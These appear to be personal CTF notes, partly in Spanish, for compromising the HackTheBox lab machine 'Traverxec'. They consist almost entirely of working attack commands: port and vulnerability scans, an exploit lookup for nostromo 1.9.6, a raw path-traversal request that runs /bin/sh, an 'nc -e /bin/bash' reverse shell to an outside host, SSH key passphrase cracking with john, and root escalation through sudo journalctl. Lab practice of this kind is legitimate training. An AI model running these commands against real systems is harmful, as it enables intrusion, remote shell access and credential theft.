nmap -A -p- -oA output 10.129.1.193 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA traverxec 10.129.1.193
nmap -sU -O -p- -oA traverxec-udp 10.129.1.193
nikto -h 10.129.159.31:80
whatweb http://10.129.1.193
http://10.129.1.193/
searchsploit nostromo 1.9.6
searchsploit -m 47837
cat 47837.py
telnet 10.129.1.193
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Content-Length: 1
nc -e /bin/bash 10.10.14.135 443
script /dev/null -c bash
Despues hacer un ctrl Z
stty raw -echo; fg
reset
El terminal type es:
xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 187
john --wordlist=/usr/share/worldlists/rockyou.txt hash
http://10.129.1.193/david/protected-file-area
Bajamos el archivo
tar -xvf backup-ssh-identity-files.tgz
cd home/david/.ssh
cat id_rsa
john --wordlist=/usr/share/worldlists/rockyou.txt hash
Conseguimos las credenciales-> david:hunter
ssh id_rsa david@10.129.1.193
ls -al
cd bin
cat server-stats.sh
Vemos que usa journalctl
https://gtfobins.github.io/gtfobins/journalctl/
Reducimos el tama~o de la ventana
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/bash
